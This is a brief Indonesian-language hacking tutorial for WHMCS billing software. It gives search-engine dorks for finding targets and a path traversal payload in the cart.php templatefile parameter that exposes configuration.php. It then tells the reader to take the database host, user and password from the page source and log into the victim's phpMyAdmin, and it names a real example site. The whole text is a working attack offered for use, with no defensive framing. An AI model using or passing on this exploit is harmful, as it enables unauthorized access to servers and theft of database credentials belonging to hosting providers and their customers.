Tutorial Hacking WHMCS

Tutorial Hacking WHMCS

Exploit Powered by whmcs

#Keyword 

Dork :

1. inurl:whmcs/cart.php?a=

2. inurl:billing/cart.php?a=

#Exploit 

:

cart.php?a=test&templatefile=../../../configuration.php

#Contoh 

[sudah di patch/fix] :

http://www.7m2.net/whmcs/cart.php?

#Tambain 

Exploit di belakang cart.php? sampai jadi :

http://target.com/whmcs/cart.php?a=test&...ration.php

# Klik kanan > View page source

Nanti Muncul

$db

$license

$host

$user

$pass

Tinggal login di

http://www.target.com/phpmyadmin

---

Thanks TO : ./Layz Dot ID

IDCA